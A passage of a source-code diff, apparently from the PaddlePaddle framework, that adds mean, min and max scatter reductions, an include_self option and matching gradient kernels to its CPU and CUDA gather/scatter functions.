+        num_elements.push_back(1);
+      else
+        num_elements.push_back(0);
+    }
   }
 
   int64_t inner_dim_size = 1;
@@ -267,10 +550,25 @@ void cpu_scatter_value_grad_kernel(phi::DenseTensor self,
     outer_dim_size_self *= self_dims[i];
     outer_dim_size_grad *= grad_dims[i];
   }
-  int64_t index_idx = index.numel() - 1;
   for (int i = 0; i < grad_size; i++) {
     grad_data[i] = static_cast<tensor_t>(0);
   }
+  int64_t index_idx = index.numel() - 1;
+  if (reduce == "mean") {
+    for (int64_t i = inner_dim_size - 1; i >= 0; i--) {
+      for (int64_t j = select_dim_size - 1; j >= 0; j--) {
+        for (int64_t k = outer_dim_size - 1; k >= 0; k--) {
+          int64_t index = index_data[index_idx];
+          int64_t replace_index_self =
+              k + index * outer_dim_size_self +
+              i * outer_dim_size_self * self_select_dim_size;
+          num_elements[replace_index_self] += 1;
+          index_idx--;
+        }
+      }
+    }
+    index_idx = index.numel() - 1;
+  }
   for (int64_t i = inner_dim_size - 1; i >= 0; i--) {
     for (int64_t j = select_dim_size - 1; j >= 0; j--) {
       for (int64_t k = outer_dim_size - 1; k >= 0; k--) {
@@ -281,23 +579,131 @@ void cpu_scatter_value_grad_kernel(phi::DenseTensor self,
         int64_t replace_index_grad =
             k + j * outer_dim_size_grad +
             i * outer_dim_size_grad * grad_select_dim_size;
-        if (!is_self_grad_used[replace_index_self]) {
+        if (reduce == "add")
           grad_data[replace_index_grad] = self_data[replace_index_self];
-          is_self_grad_used[replace_index_self] = true;
-        }
+        else if (reduce == "mean")
+          grad_data[replace_index_grad] =
+              self_data[replace_index_self] /
+              static_cast<tensor_t>(num_elements[replace_index_self]);
         index_idx--;
       }
     }
   }
-  delete[] is_self_grad_used;
 }
 
-Instantiate_Template_Function(cpu_gather_kernel)
-    Instantiate_Template_Function(cpu_scatter_assign_kernel)
-        Instantiate_Template_Function(cpu_scatter_add_kernel)
-            Instantiate_Template_Function(cpu_scatter_mul_kernel)
-                Instantiate_Template_Function(cpu_scatter_input_grad_kernel)
-                    Instantiate_Template_Function(cpu_scatter_value_grad_kernel)
+template <typename tensor_t, typename index_t>
+void cpu_scatter_mul_min_max_value_grad_kernel(phi::DenseTensor self,
+                                               int dim,
+                                               const phi::DenseTensor& index,
+                                               const phi::DenseTensor& out,
+                                               const phi::DenseTensor& x,
+                                               const phi::DenseTensor& value,
+                                               phi::DenseTensor grad,
+                                               const std::string& reduce,
+                                               bool include_self,
+                                               const phi::DeviceContext& ctx) {
+  auto* self_data = self.data<tensor_t>();
+  auto* index_data = index.data<index_t>();
+  auto* grad_data = grad.data<tensor_t>();
+  auto* out_data = out.data<tensor_t>();
+  auto* x_data = x.data<tensor_t>();
+  auto* value_data = value.data<tensor_t>();
+
+  auto index_dims = index.dims();
+  auto self_dims = self.dims();
+  auto grad_dims = grad.dims();
+
+  int64_t self_size = self.numel();
+  std::vector<int> num_elements;
+  if (reduce == "amin" || reduce == "amax") {
+    for (int i = 0; i < self_size; i++) {
+      num_elements.push_back(0);
+    }
+  }
+  int64_t inner_dim_size = 1;
+  int64_t outer_dim_size = 1;
+  int64_t outer_dim_size_self = 1;
+  int64_t outer_dim_size_grad = 1;
+  int64_t select_dim_size = index_dims[dim];
+  int64_t self_select_dim_size = self_dims[dim];
+  int64_t grad_select_dim_size = grad_dims[dim];
+  for (int i = 0; i < dim; ++i) {
+    inner_dim_size *= index_dims[i];
+  }
+
+  for (int i = dim + 1; i < index_dims.size(); i++) {
+    outer_dim_size *= index_dims[i];
+    outer_dim_size_self *= self_dims[i];
+    outer_dim_size_grad *= grad_dims[i];
+  }
+  int64_t index_idx = 0;
+  for (int64_t i = 0; i < inner_dim_size; i++) {
+    for (int64_t j = 0; j < select_dim_size; j++) {
+      for (int64_t k = 0; k < outer_dim_size; k++) {
+        int64_t index = index_data[index_idx];
+        int64_t replace_index_self =
+            k + index * outer_dim_size_self +
+            i * outer_dim_size_self * self_select_dim_size;
+        int64_t replace_index_grad =
+            k + j * outer_dim_size_grad +
+            i * outer_dim_size_grad * grad_select_dim_size;
+        if ((reduce == "amin" || reduce == "amax") &&
+            out_data[replace_index_self] == value_data[replace_index_grad]) {
+          num_elements[replace_index_self] += 1;
+        } else if (reduce == "mul" || reduce == "multiply") {
+          grad_data[replace_index_grad] =
+              self_data[replace_index_self] *
+              (out_data[replace_index_self] / value_data[replace_index_grad]);
+        }
+        index_idx++;
+      }
+    }
+  }
+  if (reduce == "amin" || reduce == "amax") {
+    index_idx = 0;
+    for (int64_t i = 0; i < inner_dim_size; i++) {
+      for (int64_t j = 0; j < select_dim_size; j++) {
+        for (int64_t k = 0; k < outer_dim_size; k++) {
+          int64_t index = index_data[index_idx];
+          int64_t replace_index_self =
+              k + index * outer_dim_size_self +
+              i * outer_dim_size_self * self_select_dim_size;
+          int64_t replace_index_grad =
+              k + j * outer_dim_size_grad +
+              i * outer_dim_size_grad * grad_select_dim_size;
+          if (out_data[replace_index_self] == value_data[replace_index_grad]) {
+            if (out_data[replace_index_self] == x_data[replace_index_self])
+              grad_data[replace_index_grad] =
+                  self_data[replace_index_self] /
+                  static_cast<tensor_t>(num_elements[replace_index_self] + 1);
+            else
+              grad_data[replace_index_grad] =
+                  self_data[replace_index_self] /
+                  static_cast<tensor_t>(num_elements[replace_index_self]);
+          }
+          index_idx++;
+        }
+      }
+    }
+  }
+}
+
+Instantiate_Template_Function(cpu_gather_kernel)                  // NOLINT
+    Instantiate_Template_Function(cpu_scatter_assign_kernel)      // NOLINT
+    Instantiate_Template_Function(cpu_scatter_add_kernel)         // NOLINT
+    Instantiate_Template_Function(cpu_scatter_mul_kernel)         // NOLINT
+    Instantiate_Template_Function(cpu_scatter_mean_kernel)        // NOLINT
+    Instantiate_Template_Function(cpu_scatter_max_kernel)         // NOLINT
+    Instantiate_Template_Function(cpu_scatter_min_kernel)         // NOLINT
+    Instantiate_Template_Function(cpu_scatter_input_grad_kernel)  // NOLINT
+    Instantiate_Template_Function(cpu_scatter_value_grad_kernel)  // NOLINT
+    Instantiate_Template_Function_With_Out(
+        cpu_scatter_mul_min_max_input_grad_kernel)                     // NOLINT
+    Instantiate_Template_Function(cpu_scatter_mean_input_grad_kernel)  // NOLINT
+    Instantiate_Template_Function_With_Out(
+        cpu_scatter_add_mean_value_grad_kernel)  // NOLINT
+    Instantiate_Template_Function_With_Out(
+        cpu_scatter_mul_min_max_value_grad_kernel)  // NOLINT
 
 }  // namespace funcs
 }  // namespace phi
diff --git a/paddle/phi/kernels/funcs/gather_scatter_functor.cu b/paddle/phi/kernels/funcs/gather_scatter_functor.cu
index cbe866d4924d54..865b1d74e36c34 100644
--- a/paddle/phi/kernels/funcs/gather_scatter_functor.cu
+++ b/paddle/phi/kernels/funcs/gather_scatter_functor.cu
@@ -15,6 +15,7 @@ limitations under the License. */
 #include "paddle/phi/kernels/funcs/gather_scatter_functor.h"
 #include "paddle/phi/backends/gpu/gpu_context.h"
 #include "paddle/phi/backends/gpu/gpu_primitives.h"
+#include "paddle/phi/kernels/funcs/math_function.h"
 
 namespace phi {
 namespace funcs {
@@ -46,14 +47,58 @@ static ReduceAdd reduce_add;
 
 class ReduceMul {
  public:
-  template <typename tensor_t>
+  template <
+      typename tensor_t,
+      std::enable_if_t<!std::is_same<tensor_t, uint8_t>::value>* = nullptr>
+  __device__ void operator()(tensor_t* self_data, tensor_t* src_data) const {
+    phi::CudaAtomicMul(self_data, *src_data);
+  }
+  template <typename tensor_t,
+            std::enable_if_t<std::is_same<tensor_t, uint8_t>::value>* = nullptr>
   __device__ void operator()(tensor_t* self_data, tensor_t* src_data) const {
     *self_data *= *src_data;
-    // TODO(huangxu96) platform::CudaAtomicMul(*self_data, *src_data);
   }
 };
 static ReduceMul reduce_mul;
 
+class ReduceMax {
+ public:
+  template <
+      typename tensor_t,
+      std::enable_if_t<!std::is_same<tensor_t, uint8_t>::value>* = nullptr>
+  __device__ void operator()(tensor_t* self_data, tensor_t* src_data) const {
+    phi::CudaAtomicMax(self_data, *src_data);
+  }
+  template <typename tensor_t,
+            std::enable_if_t<std::is_same<tensor_t, uint8_t>::value>* = nullptr>
+  __device__ void operator()(tensor_t* self_data, tensor_t* src_data) const {
+    *self_data = *src_data > *self_data ? *src_data : *self_data;
+  }
+};
+static ReduceMax reduce_max;
+
+class ReduceMin {
+ public:
+  template <
+      typename tensor_t,
+      std::enable_if_t<!std::is_same<tensor_t, uint8_t>::value>* = nullptr>
+  __device__ void operator()(tensor_t* self_data, tensor_t* src_data) const {
+    phi::CudaAtomicMin(self_data, *src_data);
+  }
+  template <typename tensor_t,
+            std::enable_if_t<std::is_same<tensor_t, uint8_t>::value>* = nullptr>
+  __device__ void operator()(tensor_t* self_data, tensor_t* src_data) const {
+    *self_data = *src_data < *self_data ? *src_data : *self_data;
+  }
+};
+static ReduceMin reduce_min;
+
+__global__ void CudaMemsetAsync(int* dest, int value, size_t size) {
+  int tid = threadIdx.x + blockIdx.x * blockDim.x;
+  if (tid * sizeof(int) >= size) return;
+  dest[tid] = value;
+}
+
 template <typename tensor_t,
           typename index_t,
           typename func_t,
@@ -70,17 +115,10 @@ __global__ void ScatterAssignGPUKernel(tensor_t* self_data,
                                        int64_t outer_dim_size_src,
                                        int64_t numel,
                                        int64_t numel_data,
-                                       const func_t& reduce_op) {
+                                       const func_t& reduce_op,
+                                       int* thread_ids) {
   int tid = threadIdx.x + blockIdx.x * blockDim.x;
   if (tid >= numel) return;
-  extern __shared__ int thread_ids[];
-
-  if (tid == 0) {
-    for (int i = 0; i < numel_data; i++) {
-      thread_ids[i] = 0;
-    }
-  }
-  __syncthreads();
   int64_t i, j, k;  // The i, j, k here is the index of the 3 layers loop
                     // squeezed from the N layers loop.
   /* tid = i * select_dim_size * outer_dim_size + j * outer_dim_size + k */
@@ -143,9 +181,19 @@ __global__ void GatherScatterGPUKernel(tensor_t* self_data,
                                        int64_t outer_dim_size_src,
                                        int64_t numel,
                                        int64_t numel_data,
-                                       const func_t& reduce_op) {
+                                       bool include_self,
+                                       const func_t& reduce_op,
+                                       int* shared_mem) {
   int tid = threadIdx.x + blockIdx.x * blockDim.x;
   if (tid >= numel) return;
+  if (include_self == false) {
+    if (tid == 0) {
+      for (int i = 0; i < numel_data; i++) {
+        shared_mem[i] = numel + 1;  // thread_ids
+      }
+    }
+    __syncthreads();
+  }
   int64_t i, j, k;  // The i, j, k here is the index of the 3 layers loop
                     // squeezed from the N layers loop.
   /* tid = i * select_dim_size * outer_dim_size + j * outer_dim_size + k */
@@ -182,9 +230,95 @@ __global__ void GatherScatterGPUKernel(tensor_t* self_data,
     replace_index_src = k + index * outer_dim_size_src +
                         i * outer_dim_size_src * src_select_dim_size;
   }
+  bool is_op_done = false;
+  if (include_self == false) {
+    phi::CudaAtomicMin(shared_mem + replace_index_self, tid);
+    __syncthreads();
+    if (tid == shared_mem[replace_index_self]) {
+      self_data[replace_index_self] = src_data[replace_index_src];
+      is_op_done = true;
+    }
+    __syncthreads();
+  }
+  if (!is_op_done)
+    reduce_op(static_cast<tensor_t*>(self_data + replace_index_self),
+              static_cast<tensor_t*>(src_data + replace_index_src));
+}
 
+template <typename tensor_t,
+          typename index_t,
+          typename func_t,
+          bool is_scatter_like = true>
+__global__ void ScatterMeanGPUKernel(tensor_t* self_data,
+                                     int dim,
+                                     const index_t* index_data,
+                                     tensor_t* src_data,
+                                     int select_dim_size,
+                                     int self_select_dim_size,
+                                     int src_select_dim_size,
+                                     int64_t outer_dim_size,
+                                     int64_t outer_dim_size_self,
+                                     int64_t outer_dim_size_src,
+                                     int64_t numel,
+                                     int64_t numel_data,
+                                     bool include_self,
+                                     const func_t& reduce_op,
+                                     int* shared_mem) {
+  int tid = threadIdx.x + blockIdx.x * blockDim.x;
+  if (tid >= numel) return;
+
+  int64_t i, j, k;  // The i, j, k here is the index of the 3 layers loop
+                    // squeezed from the N layers loop.
+  /* tid = i * select_dim_size * outer_dim_size + j * outer_dim_size + k */
+  i = tid / (select_dim_size * outer_dim_size);
+  int64_t remind = tid % (select_dim_size * outer_dim_size);
+  j = remind / outer_dim_size;
+  k = remind % outer_dim_size;
+  index_t index = index_data[tid];
+  /*
+    gather computation formula:
+
+    self[i][j][k] = src[index[i][j][k]][j][k]  # if dim == 0
+    self[i][j][k] = src[i][index[i][j][k]][k]  # if dim == 1
+    self[i][j][k] = src[i][j][index[i][j][k]]  # if dim == 2
+
+    scatter computation formula:
+
+    self[index[i][j][k]][j][k] = src[i][j][k]  # if dim == 0
+    self[i][index[i][j][k]][k] = src[i][j][k]  # if dim == 1
+    self[i][j][index[i][j][k]] = src[i][j][k]  # if dim == 2
+
+  */
+  // index matrix has different shape with self matrix or src matrix.
+  int64_t replace_index_self, replace_index_src;
+  if (is_scatter_like) {
+    replace_index_self = k + index * outer_dim_size_self +
+                         i * outer_dim_size_self * self_select_dim_size;
+
+    replace_index_src = k + j * outer_dim_size_src +
+                        i * outer_dim_size_src * src_select_dim_size;
+  } else {
+    replace_index_self = tid;
+
+    replace_index_src = k + index * outer_dim_size_src +
+                        i * outer_dim_size_src * src_select_dim_size;
+  }
+  if (include_self == false) {
+    self_data[replace_index_self] = 0;
+    __syncthreads();
+  }
   reduce_op(static_cast<tensor_t*>(self_data + replace_index_self),
             static_cast<tensor_t*>(src_data + replace_index_src));
+
+  phi::CudaAtomicMax(shared_mem + replace_index_self, tid);
+  phi::CudaAtomicAdd(shared_mem + numel_data + replace_index_self, 1);
+  __syncthreads();
+
+  if (tid == shared_mem[replace_index_self]) {
+    self_data[replace_index_self] =
+        self_data[replace_index_self] /
+        static_cast<tensor_t>(shared_mem[replace_index_self + numel_data]);
+  }
 }
 
 template <typename tensor_t,
@@ -198,6 +332,7 @@ struct gpu_gather_scatter_functor {
                   phi::DenseTensor src,
                   const std::string& method_name,
                   const func_t& reduce_op,
+                  bool include_self,
                   const phi::DeviceContext& ctx) {
     if (index.numel() == 0) {
       return;
@@ -234,24 +369,64 @@ struct gpu_gather_scatter_functor {
     int64_t n = inner_dim_size * select_dim_size * outer_dim_size;
     int64_t grid = (n + block - 1) / block;
     auto stream = reinterpret_cast<const phi::GPUContext&>(ctx).stream();
+    DenseTensor shared_mem_tensor;
     if (method_name == "scatter_assign_gpu") {
-      int shared_mem_size =
-          is_scatter_like ? sizeof(int) * self_size : sizeof(int) * index_size;
+      shared_mem_tensor.Resize({self_size});
+      ctx.Alloc<int>(&shared_mem_tensor);
+      phi::funcs::set_constant(ctx, &shared_mem_tensor, 0);
+
+      int* shared_mem = shared_mem_tensor.data<int>();
       ScatterAssignGPUKernel<tensor_t, index_t, func_t, is_scatter_like>
-          <<<grid, block, shared_mem_size, stream>>>(self_data,
-                                                     dim,
-                                                     index_data,
-                                                     src_data,
-                                                     select_dim_size,
-                                                     self_select_dim_size,
-                                                     src_select_dim_size,
-                                                     outer_dim_size,
-                                                     outer_dim_size_self,
-                                                     outer_dim_size_src,
-                                                     index_size,
-                                                     self_size,
-                                                     reduce_op);
+          <<<grid, block, 0, stream>>>(self_data,
+                                       dim,
+                                       index_data,
+                                       src_data,
+                                       select_dim_size,
+                                       self_select_dim_size,
+                                       src_select_dim_size,
+                                       outer_dim_size,
+                                       outer_dim_size_self,
+                                       outer_dim_size_src,
+                                       index_size,
+                                       self_size,
+                                       reduce_op,
+                                       shared_mem);
+    } else if (method_name == "scatter_mean_gpu") {
+      shared_mem_tensor.Resize({self_size * 2});
+      ctx.Alloc<int>(&shared_mem_tensor);
+      if (include_self) {
+        int64_t grid_memset = (self_size * 2 + block - 1) / block;
+        phi::funcs::set_constant(ctx, &shared_mem_tensor, 1);
+      } else {
+        phi::funcs::set_constant(ctx, &shared_mem_tensor, 0);
+      }
+
+      int* shared_mem = shared_mem_tensor.data<int>();
+      ScatterMeanGPUKernel<tensor_t, index_t, func_t, is_scatter_like>
+          <<<grid, block, 0, stream>>>(self_data,
+                                       dim,
+                                       index_data,
+                                       src_data,
+                                       select_dim_size,
+                                       self_select_dim_size,
+                                       src_select_dim_size,
+                                       outer_dim_size,
+                                       outer_dim_size_self,
+                                       outer_dim_size_src,
+                                       index_size,
+                                       self_size,
+                                       include_self,
+                                       reduce_op,
+                                       shared_mem);
     } else {
+      int* shared_mem = nullptr;
+      if (include_self == false) {
+        shared_mem_tensor.Resize({self_size});
+        ctx.Alloc<int>(&shared_mem_tensor);
+        phi::funcs::set_constant(ctx, &shared_mem_tensor, index_size + 1);
+
+        shared_mem = shared_mem_tensor.data<int>();
+      }
       GatherScatterGPUKernel<tensor_t, index_t, func_t, is_scatter_like>
           <<<grid, block, 0, stream>>>(self_data,
                                        dim,
@@ -265,7 +440,9 @@ struct gpu_gather_scatter_functor {
                                        outer_dim_size_src,
                                        index_size,
                                        self_size,
-                                       reduce_op);
+                                       include_self,
+                                       reduce_op,
+                                       shared_mem);
     }
   }
 };  // struct gpu_gather_scatter_functor
@@ -275,11 +452,18 @@ void gpu_gather_kernel(phi::DenseTensor self,
                        int dim,
                        const phi::DenseTensor& index,
                        phi::DenseTensor result,
+                       bool include_self,
                        const phi::DeviceContext& ctx) {
   gpu_gather_scatter_functor<tensor_t,
                              index_t,
-                             /*is_scatter_like=*/false>()(
-      result, dim, index, self, "gather_out_gpu", tensor_assign, ctx);
+                             /*is_scatter_like=*/false>()(result,
+                                                          dim,
+                                                          index,
+                                                          self,
+                                                          "gather_out_gpu",
+                                                          tensor_assign,
+                                                          include_self,
+                                                          ctx);
   return;
 }
 
@@ -288,11 +472,18 @@ void gpu_scatter_assign_kernel(phi::DenseTensor self,
                                int dim,
                                const phi::DenseTensor& index,
                                phi::DenseTensor src,
+                               bool include_self,
                                const phi::DeviceContext& ctx) {
   gpu_gather_scatter_functor<tensor_t,
                              index_t,
-                             /*is_scatter_like=*/true>()(
-      self, dim, index, src, "scatter_assign_gpu", tensor_assign, ctx);
+                             /*is_scatter_like=*/true>()(self,
+                                                         dim,
+                                                         index,
+                                                         src,
+                                                         "scatter_assign_gpu",
+                                                         tensor_assign,
+                                                         include_self,
+                                                         ctx);
 }
 
 template <typename tensor_t, typename index_t>
@@ -300,11 +491,12 @@ void gpu_scatter_add_kernel(phi::DenseTensor self,
                             int dim,
                             const phi::DenseTensor& index,
                             phi::DenseTensor src,
+                            bool include_self,
                             const phi::DeviceContext& ctx) {
   gpu_gather_scatter_functor<tensor_t,
                              index_t,
                              /*is_scatter_like=*/true>()(
-      self, dim, index, src, "scatter_add_gpu", reduce_add, ctx);
+      self, dim, index, src, "scatter_add_gpu", reduce_add, include_self, ctx);
 }
 
 template <typename tensor_t, typename index_t>
@@ -312,11 +504,51 @@ void gpu_scatter_mul_kernel(phi::DenseTensor self,
                             int dim,
                             const phi::DenseTensor& index,
                             phi::DenseTensor src,
+                            bool include_self,
+                            const phi::DeviceContext& ctx) {
+  gpu_gather_scatter_functor<tensor_t,
+                             index_t,
+                             /*is_scatter_like=*/true>()(
+      self, dim, index, src, "scatter_mul_gpu", reduce_mul, include_self, ctx);
+}
+
+template <typename tensor_t, typename index_t>
+void gpu_scatter_mean_kernel(phi::DenseTensor self,
+                             int dim,
+                             const phi::DenseTensor& index,
+                             phi::DenseTensor src,
+                             bool include_self,
+                             const phi::DeviceContext& ctx) {
+  gpu_gather_scatter_functor<tensor_t,
+                             index_t,
+                             /*is_scatter_like=*/true>()(
+      self, dim, index, src, "scatter_mean_gpu", reduce_add, include_self, ctx);
+}
+
+template <typename tensor_t, typename index_t>
+void gpu_scatter_max_kernel(phi::DenseTensor self,
+                            int dim,
+                            const phi::DenseTensor& index,
+                            phi::DenseTensor src,
+                            bool include_self,
                             const phi::DeviceContext& ctx) {
   gpu_gather_scatter_functor<tensor_t,
                              index_t,
                              /*is_scatter_like=*/true>()(
-      self, dim, index, src, "scatter_mul_gpu", reduce_mul, ctx);
+      self, dim, index, src, "scatter_max_gpu", reduce_max, include_self, ctx);
+}
+
+template <typename tensor_t, typename index_t>
+void gpu_scatter_min_kernel(phi::DenseTensor self,
+                            int dim,
+                            const phi::DenseTensor& index,
+                            phi::DenseTensor src,
+                            bool include_self,
+                            const phi::DeviceContext& ctx) {
+  gpu_gather_scatter_functor<tensor_t,
+                             index_t,
+                             /*is_scatter_like=*/true>()(
+      self, dim, index, src, "scatter_min_gpu", reduce_min, include_self, ctx);
 }
 
 template <typename tensor_t, typename index_t>
@@ -347,6 +579,7 @@ void gpu_scatter_input_grad_kernel(phi::DenseTensor self,
                                    int dim,
                                    const phi::DenseTensor& index,
                                    phi::DenseTensor grad,
+                                   bool include_self UNUSED,
                                    const phi::DeviceContext& ctx) {
   auto* index_data = index.data<index_t>();
   auto* grad_data = grad.data<tensor_t>();
@@ -374,17 +607,265 @@ void gpu_scatter_input_grad_kernel(phi::DenseTensor self,
   int64_t n = inner_dim_size * select_dim_size * outer_dim_size;
   int64_t grid = (n + block - 1) / block;
   auto stream = reinterpret_cast<const phi::GPUContext&>(ctx).stream();
-  int shared_mem_size = sizeof(int) * grad_size;
   ScatterInputGradGPUKernel<tensor_t, index_t>
-      <<<grid, block, shared_mem_size, stream>>>(grad_data,
-                                                 dim,
-                                                 index_data,
-                                                 select_dim_size,
-                                                 grad_select_dim_size,
-                                                 outer_dim_size,
-                                                 outer_dim_size_data,
-                                                 index_size,
-                                                 grad_size);
+      <<<grid, block, 0, stream>>>(grad_data,
+                                   dim,
+                                   index_data,
+                                   select_dim_size,
+                                   grad_select_dim_size,
+                                   outer_dim_size,
+                                   outer_dim_size_data,
+                                   index_size,
+                                   grad_size);
+}
+
+template <typename tensor_t, typename index_t>
+__global__ void ScatterMulInputGradGPUKernel(tensor_t* grad_data,
+                                             int dim,
+                                             const index_t* index_data,
+                                             const tensor_t* out_data,
+                                             const tensor_t* x_data,
+                                             int select_dim_size,
+                                             int grad_select_dim_size,
+                                             int64_t outer_dim_size,
+                                             int64_t outer_dim_size_grad,
+                                             int64_t numel,
+                                             int64_t numel_grad,
+                                             int* thread_ids) {
+  int tid = threadIdx.x + blockIdx.x * blockDim.x;
+  if (tid >= numel) return;
+  int64_t i, j, k;
+  i = tid / (select_dim_size * outer_dim_size);
+  int64_t remind = tid % (select_dim_size * outer_dim_size);
+  j = remind / outer_dim_size;
+  k = remind % outer_dim_size;
+  index_t index = index_data[tid];
+  int64_t replace_index = k + index * outer_dim_size_grad +
+                          i * outer_dim_size_grad * grad_select_dim_size;
+  atomicMax(thread_ids + replace_index, tid);
+  __syncthreads();
+  if (tid == thread_ids[replace_index]) {
+    grad_data[replace_index] = grad_data[replace_index] *
+                               out_data[replace_index] / x_data[replace_index];
+  }
+}
+
+template <typename tensor_t, typename index_t>
+__global__ void ScatterMinMaxInputGradGPUKernel(tensor_t* grad_data,
+                                                int dim,
+                                                const index_t* index_data,
+                                                const tensor_t* out_data,
+                                                const tensor_t* x_data,
+                                                const tensor_t* value_data,
+                                                const tensor_t* self_data,
+                                                int select_dim_size,
+                                                int grad_select_dim_size,
+                                                int value_select_dim_size,
+                                                int64_t outer_dim_size,
+                                                int64_t outer_dim_size_grad,
+                                                int64_t outer_dim_size_value,
+                                                int64_t numel,
+                                                int64_t numel_grad,
+                                                const std::string& reduce,
+                                                int* shared_mem) {
+  int tid = threadIdx.x + blockIdx.x * blockDim.x;
+  if (tid >= numel) return;
+  int64_t i, j, k;
+  i = tid / (select_dim_size * outer_dim_size);
+  int64_t remind = tid % (select_dim_size * outer_dim_size);
+  j = remind / outer_dim_size;
+  k = remind % outer_dim_size;
+  index_t index = index_data[tid];
+  int64_t replace_index = k + index * outer_dim_size_grad +
+                          i * outer_dim_size_grad * grad_select_dim_size;
+  int64_t replace_index_value =
+      k + j * outer_dim_size_value +
+      i * outer_dim_size_value * value_select_dim_size;
+  if (value_data[replace_index_value] == out_data[replace_index])
+    phi::CudaAtomicAdd(shared_mem + replace_index, 1);
+  __syncthreads();
+  if (out_data[replace_index] != x_data[replace_index]) {
+    grad_data[replace_index] = 0;
+  } else {
+    grad_data[replace_index] = self_data[replace_index] /
+                               static_cast<tensor_t>(shared_mem[replace_index]);
+  }
+}
+
+template <typename tensor_t, typename index_t>
+void gpu_scatter_mul_min_max_input_grad_kernel(phi::DenseTensor self,
+                                               int dim,
+                                               const phi::DenseTensor& index,
+                                               const phi::DenseTensor& out,
+                                               const phi::DenseTensor& x,
+                                               const phi::DenseTensor& value
+                                                   UNUSED,
+                                               phi::DenseTensor grad,
+                                               const std::string& reduce,
+                                               bool include_self UNUSED,
+                                               const phi::DeviceContext& ctx) {
+  auto* index_data = index.data<index_t>();
+  auto* grad_data = grad.data<tensor_t>();
+  auto* out_data = out.data<tensor_t>();
+  auto* x_data = x.data<tensor_t>();
+  auto* value_data = value.data<tensor_t>();
+  auto* self_data = self.data<tensor_t>();
+
+  int64_t grad_size = grad.numel();
+  int64_t index_size = index.numel();
+  auto index_dims = index.dims();
+  auto grad_dims = grad.dims();
+  auto x_dims = x.dims();
+  auto value_dims = value.dims();
+
+  int64_t inner_dim_size = 1;
+  int64_t outer_dim_size = 1;
+  int64_t outer_dim_size_grad = 1;
+  int64_t outer_dim_size_value = 1;
+  int64_t select_dim_size = index_dims[dim];
+  int64_t grad_select_dim_size = grad_dims[dim];
+  int64_t value_select_dim_size = grad_dims[dim];
+  for (int i = 0; i < dim; ++i) {
+    inner_dim_size *= index_dims[i];
+  }
+
+  for (int i = dim + 1; i < index_dims.size(); i++) {
+    outer_dim_size *= index_dims[i];
+    outer_dim_size_grad *= grad_dims[i];
+    outer_dim_size_value *= value_dims[i];
+  }
+  int block = 512;
+  int64_t n = inner_dim_size * select_dim_size * outer_dim_size;
+  int64_t grid = (n + block - 1) / block;
+  auto stream = reinterpret_cast<const phi::GPUContext&>(ctx).stream();
+  DenseTensor shared_mem_tensor;
+  shared_mem_tensor.Resize({grad_size});
+  ctx.Alloc<int>(&shared_mem_tensor);
+  int* shared_mem = shared_mem_tensor.data<int>();
+  if (reduce == "mul" || reduce == "multiply") {
+    phi::funcs::set_constant(ctx, &shared_mem_tensor, 0);
+    ScatterMulInputGradGPUKernel<tensor_t, index_t>
+        <<<grid, block, 0, stream>>>(grad_data,
+                                     dim,
+                                     index_data,
+                                     out_data,
+                                     x_data,
+                                     select_dim_size,
+                                     grad_select_dim_size,
+                                     outer_dim_size,
+                                     outer_dim_size_grad,
+                                     index_size,
+                                     grad_size,
+                                     shared_mem);
+  } else if (reduce == "amin" || reduce == "amax") {
+    phi::funcs::set_constant(ctx, &shared_mem_tensor, 1);
+    ScatterMinMaxInputGradGPUKernel<tensor_t, index_t>
+        <<<grid, block, 0, stream>>>(grad_data,
+                                     dim,
+                                     index_data,
+                                     out_data,
+                                     x_data,
+                                     value_data,
+                                     self_data,
+                                     select_dim_size,
+                                     grad_select_dim_size,
+                                     value_select_dim_size,
+                                     outer_dim_size,
+                                     outer_dim_size_grad,
+                                     outer_dim_size_value,
+                                     index_size,
+                                     grad_size,
+                                     reduce,
+                                     shared_mem);
+  }
+}
+
+template <typename tensor_t, typename index_t>
+__global__ void ScatterMeanInputGradGPUKernel(tensor_t* grad_data,
+                                              int dim,
+                                              const index_t* index_data,
+                                              int select_dim_size,
+                                              int grad_select_dim_size,
+                                              int64_t outer_dim_size,
+                                              int64_t outer_dim_size_grad,
+                                              int64_t numel,
+                                              int64_t numel_grad,
+                                              int* shared_mem) {
+  int tid = threadIdx.x + blockIdx.x * blockDim.x;
+  if (tid >= numel) return;
+  int64_t i, j, k;
+  i = tid / (select_dim_size * outer_dim_size);
+  int64_t remind = tid % (select_dim_size * outer_dim_size);
+  j = remind / outer_dim_size;
+  k = remind % outer_dim_size;
+  index_t index = index_data[tid];
+  int64_t replace_index = k + index * outer_dim_size_grad +
+                          i * outer_dim_size_grad * grad_select_dim_size;
+  atomicMax(shared_mem + replace_index, tid);
+  phi::CudaAtomicAdd(shared_mem + numel_grad + replace_index, 1);
+  __syncthreads();
+  if (tid == shared_mem[replace_index]) {
+    grad_data[replace_index] =
+        grad_data[replace_index] /
+        static_cast<tensor_t>(shared_mem[numel_grad + replace_index]);
+  }
+}
+
+template <typename tensor_t, typename index_t>
+void gpu_scatter_mean_input_grad_kernel(phi::DenseTensor self,
+                                        int dim,
+                                        const phi::DenseTensor& index,
+                                        phi::DenseTensor grad,
+                                        bool include_self UNUSED,
+                                        const phi::DeviceContext& ctx) {
+  auto* index_data = index.data<index_t>();
+  auto* grad_data = grad.data<tensor_t>();
+
+  auto index_dims = index.dims();
+  auto grad_dims = grad.dims();
+
+  int64_t grad_size = grad.numel();
+  int64_t index_size = index.numel();
+
+  int64_t inner_dim_size = 1;
+  int64_t outer_dim_size = 1;
+  int64_t outer_dim_size_grad = 1;
+  int64_t select_dim_size = index_dims[dim];
+  int64_t grad_select_dim_size = grad_dims[dim];
+  for (int i = 0; i < dim; ++i) {
+    inner_dim_size *= index_dims[i];
+  }
+
+  for (int i = dim + 1; i < index_dims.size(); i++) {
+    outer_dim_size *= index_dims[i];
+    outer_dim_size_grad *= grad_dims[i];
+  }
+
+  DenseTensor shared_mem_tensor;
+  shared_mem_tensor.Resize({grad_size * 2});
+  ctx.Alloc<int>(&shared_mem_tensor);
+  phi::funcs::set_constant(ctx, &shared_mem_tensor, 0);
+  int* shared_mem = shared_mem_tensor.data<int>();
+
+  int block = 512;
+  int64_t grid_memset = (grad_size + block - 1) / block;
+  auto stream = reinterpret_cast<const phi::GPUContext&>(ctx).stream();
+  CudaMemsetAsync<<<grid_memset, block, 0, stream>>>(
+      shared_mem + grad_size, 1, sizeof(int) * grad_size);
+
+  int64_t n = inner_dim_size * select_dim_size * outer_dim_size;
+  int64_t grid = (n + block - 1) / block;
+  ScatterMeanInputGradGPUKernel<tensor_t, index_t>
